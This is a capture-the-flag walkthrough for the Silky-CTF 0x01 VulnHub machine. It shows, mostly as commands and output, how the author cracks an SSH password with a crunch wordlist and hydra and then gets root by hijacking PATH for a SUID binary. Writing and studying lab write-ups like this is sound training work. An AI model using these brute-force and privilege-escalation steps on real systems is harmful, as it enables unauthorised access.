SILKY-CTF 0x01 (VULNHUB)

LINK: https://download.vulnhub.com/silky/Silky-CTF_0x01.ova

root@kali:~# netdiscover -i eth0

Currently scanning: 192.168.118.0/16 | Screen View: Unique Hosts

7 Captured ARP Req/Rep packets, from 3 hosts. Total size: 420
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
—————————————————————————–
192.168.222.2 00:50:56:ea:c4:b4 4 240 VMware, Inc.
192.168.222.141 00:0c:29:6f:21:8c 2 120 VMware, Inc.
192.168.222.254 00:50:56:ec:ed:df 1 60 VMware, Inc.

root@kali:~/Downloads# nmap -A 192.168.222.141
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-20 17:51 GMT
Nmap scan report for 192.168.222.141
Host is up (0.00043s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 49:e6:fa:4c:d5:60:06:3b:c0:a8:c9:cc:00:10:7e:04 (RSA)
| 256 29:1b:39:69:32:aa:ae:9f:72:83:29:d4:27:db:f8:af (ECDSA)
|_ 256 a0:05:9e:82:bc:9d:09:ce:8e:c5:40:b2:b2:93:c6:53 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/notes.txt
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 00:0C:29:6F:21:8C (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.43 ms 192.168.222.141

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.09 seconds

now on browser

http://192.168.222.141

now try

http://192.168.222.141/robots.txt

we get

User-agent: UniversalRobot/1.0
User-agent: mein-Robot

User-agent: *
Disallow: /notes.txt

now try

http://192.168.222.141/notes.txt

we get

Ich muss unbedingt das Passwort aus der Seite entfernen, immerhin fehlen die letzten 2 Zeichen. Aber trotzdem.

using google translater

we get this

I absolutely have to remove the password from the page, after all, the last 2 characters are missing. But still.

now try this

view-source:http://192.168.222.141/

and here we get script.js

now we try

view-source:http://192.168.222.141/script.js

we get

// s1lKy

now on terminal

root@kali:~/Downloads# crunch 7 7 -t s1lky^% >> pass.txt
Crunch will now generate the following amount of data: 2640 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 330

Exploit :

root@kali:~/Downloads# hydra -l silky -P pass.txt 192.168.222.141 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC – Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-10-20 17:59:19
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 330 login tries (l:1/p:330), ~21 tries per task
[DATA] attacking ssh://192.168.222.141:22/
[STATUS] 178.00 tries/min, 178 tries in 00:01h, 154 to do in 00:01h, 16 active

login:silky
password:s1lKy#5

root@kali:~/Downloads# ssh silky@192.168.222.141
silky@192.168.222.141’s password:
Linux Silky-CTF 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Apr 14 04:04:41 2019 from 192.168.178.22

silky@Silky-CTF:~$

silky@Silky-CTF:~$ find / -perm -u=s -type f 2>/dev/null
/bin/su
/bin/ping
/bin/mount
/bin/umount
/bin/ntfs-3g
/bin/fusermount
/usr/bin/newgrp
/usr/bin/sky
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/chsh
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/sbin/pppd

silky@Silky-CTF:~$ /usr/bin/sky
Seide ist ein tierischer Faserstoff. Sie wird aus den Kokons der Seidenraupe, der Larve des Seidenspinners, gewonnen.
gezeichnet:
root

silky@Silky-CTF:~$ strings /usr/bin/sky
/lib64/ld-linux-x86-64.so.2
04I0KBY
libc.so.6
system
__cxa_finalize
__libc_start_main
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
GLIBC_2.2.5
AWAVA
AUATL
[]A\A]A^A_
echo ‘Seide ist ein tierischer Faserstoff. Sie wird aus den Kokons der Seidenraupe, der Larve des Seidenspinners, gewonnen.
gezeichnet:’; whoami
;*3$”
GCC: (Debian 6.3.0-18+deb9u1) 6.3.0 20170516
crtstuff.c
__JCR_LIST__
deregister_tm_clones
__do_global_dtors_aux
completed.6972
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
sky.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
_Jv_RegisterClasses
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got.plt
.data
.bss
.comment

silky@Silky-CTF:~$ cd /tmp

silky@Silky-CTF:/tmp$ echo ‘/bin/sh’ > whoami

silky@Silky-CTF:/tmp$ chmod 777 whoami

silky@Silky-CTF:/tmp$ export PATH=/tmp:$PATH

silky@Silky-CTF:/tmp$ /usr/bin/sky
Seide ist ein tierischer Faserstoff. Sie wird aus den Kokons der Seidenraupe, der Larve des Seidenspinners, gewonnen.
gezeichnet:

# id
uid=1000(silky) gid=1000(silky) euid=0(root) Gruppen=1000(silky),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),119(scanner)

# cd /root

# cat flag.txt
███████╗██╗██╗ ██╗ ██╗██╗ ██╗ ██████╗████████╗███████╗
██╔════╝██║██║ ██║ ██╔╝╚██╗ ██╔╝ ██╔════╝╚══██╔══╝██╔════╝
███████╗██║██║ █████╔╝ ╚████╔╝█████╗██║ ██║ █████╗
╚════██║██║██║ ██╔═██╗ ╚██╔╝ ╚════╝██║ ██║ ██╔══╝
███████║██║███████╗██║ ██╗ ██║ ╚██████╗ ██║ ██║
╚══════╝╚═╝╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝

flag: 489ca3ccb71640cce1a618a5dea48c25

Congrats 😉

@SAKSHAM DIXIT